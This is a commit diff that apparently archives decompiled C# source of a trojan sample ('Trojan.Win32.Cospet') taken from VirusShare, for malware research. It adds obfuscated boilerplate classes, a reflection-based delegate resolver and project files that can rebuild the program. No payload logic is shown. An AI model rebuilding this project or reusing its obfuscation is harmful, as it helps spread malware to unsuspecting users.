auto-decompiled msil via petikvx

add
2026-06-17 00:09:23 +00:00 · 2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,255 @@
+// Decompiled with JetBrains decompiler
+// Type: 0H9QJslJ8vJhl6OlA5.KcUfPq74sts8xsAS9e
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using \u0030H9QJslJ8vJhl6OlA5;
+using EJK98LujOyyfukEOeT;
+using lIMo5cXu7QVSJ7hdyJ;
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.ApplicationServices;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.CodeDom.Compiler;
+using System.Collections;
+using System.ComponentModel;
+using System.ComponentModel.Design;
+using System.Diagnostics;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Windows.Forms;
+using TmwCXiWu118CwLLcBx;
+using wuZRSCSYdAj3YejFZe;
+using Yi0GE2NLaKY9cPmB45;
+
+namespace \u0030H9QJslJ8vJhl6OlA5
+{
+  [HideModuleName]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [StandardModule]
+  internal sealed class KcUfPq74sts8xsAS9e
+  {
+    private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<DcHwE30dMCeD7BI4om> WFRhvVryq;
+    private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<\u0038fGOjUs9meXMHxwiww> c8YYC2iWn;
+    private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<User> \u0036QIwQWjoW;
+    private static KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv> hrZyIqIeX;
+    private static readonly KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E> ggaWNB3kv;
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    static KcUfPq74sts8xsAS9e()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      KcUfPq74sts8xsAS9e.WFRhvVryq = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<DcHwE30dMCeD7BI4om>();
+      KcUfPq74sts8xsAS9e.c8YYC2iWn = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<\u0038fGOjUs9meXMHxwiww>();
+      KcUfPq74sts8xsAS9e.\u0036QIwQWjoW = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<User>();
+      KcUfPq74sts8xsAS9e.hrZyIqIeX = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv>();
+      KcUfPq74sts8xsAS9e.ggaWNB3kv = new KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E>();
+    }
+
+    [HelpKeyword("My.Computer")]
+    internal static DcHwE30dMCeD7BI4om qHJBW149c
+    {
+      [DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.WFRhvVryq.FFGVyGxjw();
+    }
+
+    [HelpKeyword("My.Application")]
+    internal static \u0038fGOjUs9meXMHxwiww shLcqe8nZ
+    {
+      [DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.c8YYC2iWn.FFGVyGxjw();
+    }
+
+    [HelpKeyword("My.User")]
+    internal static User rfbFjvHZw
+    {
+      [DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.\u0036QIwQWjoW.FFGVyGxjw();
+    }
+
+    [HelpKeyword("My.Forms")]
+    internal static KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv fMQ7ZN6B5
+    {
+      [DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.hrZyIqIeX.FFGVyGxjw();
+    }
+
+    [HelpKeyword("My.WebServices")]
+    internal static KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E gdAC6AXkP
+    {
+      [DebuggerHidden, MethodImpl(MethodImplOptions.NoInlining)] get => KcUfPq74sts8xsAS9e.ggaWNB3kv.FFGVyGxjw();
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
+    internal sealed class nK9D6s47SZZEpvtpVv
+    {
+      public l1YmlpPMvQyqqZeffw \u0038B3TnRGbk;
+      [ThreadStatic]
+      private static Hashtable fMQ7ZN6B5;
+
+      [SpecialName]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public l1YmlpPMvQyqqZeffw shLcqe8nZ()
+      {
+        this.\u0038B3TnRGbk = KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.FFGVyGxjw<l1YmlpPMvQyqqZeffw>(this.\u0038B3TnRGbk);
+        return this.\u0038B3TnRGbk;
+      }
+
+      [SpecialName]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public void UA6v9sAn3([In] l1YmlpPMvQyqqZeffw obj0)
+      {
+        if (obj0 == this.\u0038B3TnRGbk)
+          return;
+        if (obj0 != null)
+          throw new ArgumentException(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(0));
+        this.qHJBW149c<l1YmlpPMvQyqqZeffw>(ref this.\u0038B3TnRGbk);
+      }
+
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      private static T FFGVyGxjw<T>(T Instance) where T : Form, new()
+      {
+        if ((object) Instance != null && !Instance.IsDisposed)
+          return Instance;
+        if (KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5 != null)
+        {
+          if (KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5.ContainsKey((object) typeof (T)))
+            throw new InvalidOperationException(Utils.GetResourceString(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(74)));
+        }
+        else
+          KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5 = new Hashtable();
+        KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5.Add((object) typeof (T), (object) null);
+        try
+        {
+          return new T();
+        }
+        catch (TargetInvocationException ex) when (
+        {
+          // ISSUE: unable to correctly present filter
+          ProjectData.SetProjectError((Exception) ex);
+          if (ex.InnerException != null)
+          {
+            SuccessfulFiltering;
+          }
+          else
+            throw;
+        }
+        )
+        {
+          throw new InvalidOperationException(Utils.GetResourceString(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(134), ex.InnerException.Message), ex.InnerException);
+        }
+        finally
+        {
+          KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv.fMQ7ZN6B5.Remove((object) typeof (T));
+        }
+      }
+
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      private void qHJBW149c<T>([In] ref T obj0) where T : Form
+      {
+        obj0.Dispose();
+        obj0 = default (T);
+      }
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public nK9D6s47SZZEpvtpVv()
+      {
+        qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+        // ISSUE: explicit constructor call
+        base.\u002Ector();
+      }
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public override bool Equals([In] object obj0) => base.Equals(RuntimeHelpers.GetObjectValue(obj0));
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public override int GetHashCode() => base.GetHashCode();
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      internal System.Type b959I19JP() => typeof (KcUfPq74sts8xsAS9e.nK9D6s47SZZEpvtpVv);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public override string ToString() => base.ToString();
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
+    internal sealed class jZwrCrgGT6gfLDQk2E
+    {
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public override bool Equals([In] object obj0) => base.Equals(RuntimeHelpers.GetObjectValue(obj0));
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public override int GetHashCode() => base.GetHashCode();
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      internal System.Type FFGVyGxjw() => typeof (KcUfPq74sts8xsAS9e.jZwrCrgGT6gfLDQk2E);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public override string ToString() => base.ToString();
+
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      private static T qHJBW149c<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
+
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      private void b959I19JP<T>([In] ref T obj0) => obj0 = default (T);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public jZwrCrgGT6gfLDQk2E()
+      {
+        qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+        // ISSUE: explicit constructor call
+        base.\u002Ector();
+      }
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [ComVisible(false)]
+    internal sealed class GpeR9n2Paga0nWthX6<T> where T : new()
+    {
+      [DebuggerHidden]
+      [SpecialName]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      internal T FFGVyGxjw()
+      {
+        // ISSUE: reference to a compiler-generated field
+        if ((object) KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<T>.b959I19JP == null)
+        {
+          // ISSUE: reference to a compiler-generated field
+          KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<T>.b959I19JP = new T();
+        }
+        // ISSUE: reference to a compiler-generated field
+        return KcUfPq74sts8xsAS9e.GpeR9n2Paga0nWthX6<T>.b959I19JP;
+      }
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      [MethodImpl(MethodImplOptions.NoInlining)]
+      public GpeR9n2Paga0nWthX6()
+      {
+        qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+        // ISSUE: explicit constructor call
+        base.\u002Ector();
+      }
+    }
+  }
+}
@@ -0,0 +1,16 @@
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+[assembly: AssemblyConfiguration("")]
+[assembly: Guid("0a6637c1-2f26-479e-9fcb-edec99dd9711")]
+[assembly: AssemblyFileVersion("0.0.0.0")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyDelaySign(false)]
+[assembly: AssemblyKeyName("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyDescription("")]
+[assembly: ComVisible(true)]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,61 @@
+// Decompiled with JetBrains decompiler
+// Type: EJK98LujOyyfukEOeT.8fGOjUs9meXMHxwiww
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using \u0030H9QJslJ8vJhl6OlA5;
+using dIB5tm1fm4ourlbe9N;
+using Microsoft.VisualBasic.ApplicationServices;
+using System;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Windows.Forms;
+using TmwCXiWu118CwLLcBx;
+
+namespace EJK98LujOyyfukEOeT
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class \u0038fGOjUs9meXMHxwiww : WindowsFormsApplicationBase
+  {
+    [DebuggerHidden]
+    [EditorBrowsable(EditorBrowsableState.Advanced)]
+    [STAThread]
+    [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
+    internal static void FFGVyGxjw([In] string[] obj0)
+    {
+      YbbxknoBYLxEOxk0Pn.kLjw4iIsCLsZtxc4lksN0j();
+      try
+      {
+        Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
+        qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      }
+      finally
+      {
+      }
+      KcUfPq74sts8xsAS9e.shLcqe8nZ.Run(obj0);
+    }
+
+    [DebuggerStepThrough]
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public \u0038fGOjUs9meXMHxwiww()
+      : base(AuthenticationMode.Windows)
+    {
+      this.IsSingleInstance = false;
+      this.EnableVisualStyles = true;
+      this.SaveMySettingsOnExit = true;
+      this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
+    }
+
+    [DebuggerStepThrough]
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    protected override void OnCreateMainForm() => this.MainForm = (Form) KcUfPq74sts8xsAS9e.fMQ7ZN6B5.shLcqe8nZ();
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    static \u0038fGOjUs9meXMHxwiww() => YbbxknoBYLxEOxk0Pn.kLjw4iIsCLsZtxc4lksN0j();
+  }
+}
@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: ET8bfl9MPCfSaIxovP.iN5781BvND3uA6XrP4
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+namespace ET8bfl9MPCfSaIxovP
+{
+  internal static class iN5781BvND3uA6XrP4
+  {
+  }
+}
@@ -0,0 +1,46 @@
+// Decompiled with JetBrains decompiler
+// Type: Qd3TIb3whAubSwrdUf.vE2Q8waT3eDjZJUuZD
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using System;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using TmwCXiWu118CwLLcBx;
+
+namespace Qd3TIb3whAubSwrdUf
+{
+  internal class vE2Q8waT3eDjZJUuZD
+  {
+    internal static Module Uj1VGPQhn;
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    internal static void RavJcrKKsSbih(int typemdt)
+    {
+      Type type = vE2Q8waT3eDjZJUuZD.Uj1VGPQhn.ResolveType(33554432 + typemdt);
+      foreach (FieldInfo field in type.GetFields())
+      {
+        MethodInfo method = (MethodInfo) vE2Q8waT3eDjZJUuZD.Uj1VGPQhn.ResolveMethod(field.MetadataToken + 100663296);
+        field.SetValue((object) null, (object) (MulticastDelegate) Delegate.CreateDelegate(type, method));
+      }
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public vE2Q8waT3eDjZJUuZD()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      // ISSUE: explicit constructor call
+      base.\u002Ector();
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    static vE2Q8waT3eDjZJUuZD()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      vE2Q8waT3eDjZJUuZD.Uj1VGPQhn = typeof (vE2Q8waT3eDjZJUuZD).Assembly.ManifestModule;
+    }
+
+    internal delegate void SFU4mbT3GMret7THonf(object o);
+  }
+}
@@ -0,0 +1,91 @@
+// Decompiled with JetBrains decompiler
+// Type: Service.My.MySettings
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using \u0030H9QJslJ8vJhl6OlA5;
+using Microsoft.VisualBasic.ApplicationServices;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Configuration;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using System.Threading;
+using TmwCXiWu118CwLLcBx;
+
+namespace Service.My
+{
+  [GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
+  [EditorBrowsable(EditorBrowsableState.Advanced)]
+  [CompilerGenerated]
+  internal sealed class MySettings : ApplicationSettingsBase
+  {
+    private static MySettings defaultInstance;
+    private static bool addedHandler;
+    private static object addedHandlerLockObject;
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    static MySettings()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      // ISSUE: reference to a compiler-generated field
+      // ISSUE: object of a compiler-generated type is created
+      MySettings.defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
+      // ISSUE: reference to a compiler-generated field
+      MySettings.addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public MySettings()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      // ISSUE: explicit constructor call
+      base.\u002Ector();
+    }
+
+    [DebuggerNonUserCode]
+    [EditorBrowsable(EditorBrowsableState.Advanced)]
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    private static void AutoSaveSettings(object sender, EventArgs e)
+    {
+      if (!KcUfPq74sts8xsAS9e.shLcqe8nZ.SaveMySettingsOnExit)
+        return;
+      MySettingsProperty.Settings.Save();
+    }
+
+    public static MySettings Default
+    {
+      [MethodImpl(MethodImplOptions.NoInlining)] get
+      {
+        if (!MySettings.addedHandler)
+        {
+          object handlerLockObject = MySettings.addedHandlerLockObject;
+          ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
+          Monitor.Enter(handlerLockObject);
+          try
+          {
+            if (!MySettings.addedHandler)
+            {
+              KcUfPq74sts8xsAS9e.shLcqe8nZ.Shutdown += (ShutdownEventHandler) ((sender, e) =>
+              {
+                if (!KcUfPq74sts8xsAS9e.shLcqe8nZ.SaveMySettingsOnExit)
+                  return;
+                MySettingsProperty.Settings.Save();
+              });
+              MySettings.addedHandler = true;
+            }
+          }
+          finally
+          {
+            Monitor.Exit(handlerLockObject);
+          }
+        }
+        MySettings defaultInstance = MySettings.defaultInstance;
+        return defaultInstance;
+      }
+    }
+  }
+}
@@ -0,0 +1,31 @@
+// Decompiled with JetBrains decompiler
+// Type: Service.My.MySettingsProperty
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+using System.ComponentModel.Design;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+
+namespace Service.My
+{
+  [CompilerGenerated]
+  [StandardModule]
+  [HideModuleName]
+  [DebuggerNonUserCode]
+  internal sealed class MySettingsProperty
+  {
+    [HelpKeyword("My.Settings")]
+    internal static MySettings Settings
+    {
+      [MethodImpl(MethodImplOptions.NoInlining)] get
+      {
+        MySettings settings = MySettings.Default;
+        return settings;
+      }
+    }
+  }
+}
@@ -0,0 +1,47 @@
+// Decompiled with JetBrains decompiler
+// Type: Service.My.Resources.Resources
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using lIMo5cXu7QVSJ7hdyJ;
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Globalization;
+using System.Resources;
+using System.Runtime.CompilerServices;
+
+namespace Service.My.Resources
+{
+  [CompilerGenerated]
+  [DebuggerNonUserCode]
+  [GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
+  [HideModuleName]
+  [StandardModule]
+  internal sealed class Resources
+  {
+    private static ResourceManager resourceMan;
+    private static CultureInfo resourceCulture;
+
+    [EditorBrowsable(EditorBrowsableState.Advanced)]
+    internal static ResourceManager ResourceManager
+    {
+      [MethodImpl(MethodImplOptions.NoInlining)] get
+      {
+        if (object.ReferenceEquals((object) Service.My.Resources.Resources.resourceMan, (object) null))
+          Service.My.Resources.Resources.resourceMan = new ResourceManager(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(1056), typeof (Service.My.Resources.Resources).Assembly);
+        return Service.My.Resources.Resources.resourceMan;
+      }
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Advanced)]
+    internal static CultureInfo Culture
+    {
+      [MethodImpl(MethodImplOptions.NoInlining)] get => Service.My.Resources.Resources.resourceCulture;
+      [MethodImpl(MethodImplOptions.NoInlining)] set => Service.My.Resources.Resources.resourceCulture = value;
+    }
+  }
+}
@@ -0,0 +1,25 @@
+// Decompiled with JetBrains decompiler
+// Type: TmwCXiWu118CwLLcBx.qriSERnLWqCHHxhiWL
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using System.Runtime.CompilerServices;
+
+namespace TmwCXiWu118CwLLcBx
+{
+  internal class qriSERnLWqCHHxhiWL
+  {
+    private static bool Uj1VGPQhn;
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    internal static void mQJJcrKz2UjcR()
+    {
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public qriSERnLWqCHHxhiWL()
+    {
+    }
+  }
+}
@@ -0,0 +1,60 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>Service</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="_003CModule_003E{81A84E1E-6409-4B9D-B789-B9B5420A3.cs" />
+    <Compile Include="ET8bfl9MPCfSaIxovP\iN5781BvND3uA6XrP4.cs" />
+    <Compile Include="EJK98LujOyyfukEOeT\8fGOjUs9meXMHxwiww.cs" />
+    <Compile Include="wuZRSCSYdAj3YejFZe\DcHwE30dMCeD7BI4om.cs" />
+    <Compile Include="0H9QJslJ8vJhl6OlA5\KcUfPq74sts8xsAS9e.cs" />
+    <Compile Include="Yi0GE2NLaKY9cPmB45\l1YmlpPMvQyqqZeffw.cs" />
+    <Compile Include="Service\My\MySettings.cs" />
+    <Compile Include="Service\My\MySettingsProperty.cs" />
+    <Compile Include="Service\My\Resources\Resources.cs" />
+    <Compile Include="Qd3TIb3whAubSwrdUf\vE2Q8waT3eDjZJUuZD.cs" />
+    <Compile Include="lIMo5cXu7QVSJ7hdyJ\tcJNIpeNWph4hwAAuQ.cs" />
+    <Compile Include="TmwCXiWu118CwLLcBx\qriSERnLWqCHHxhiWL.cs" />
+    <Compile Include="dIB5tm1fm4ourlbe9N\YbbxknoBYLxEOxk0Pn.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="61be7a78-12b9-44c2-bb22-b83cd81fb424" />
+    <EmbeddedResource Include="d0185bd7-034e-41ef-aec0-b5a6ab327d87" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Service", "Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.csproj", "{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,280 @@
+// Decompiled with JetBrains decompiler
+// Type: Yi0GE2NLaKY9cPmB45.l1YmlpPMvQyqqZeffw
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using lIMo5cXu7QVSJ7hdyJ;
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Drawing;
+using System.IO;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+using TmwCXiWu118CwLLcBx;
+
+namespace Yi0GE2NLaKY9cPmB45
+{
+  [DesignerGenerated]
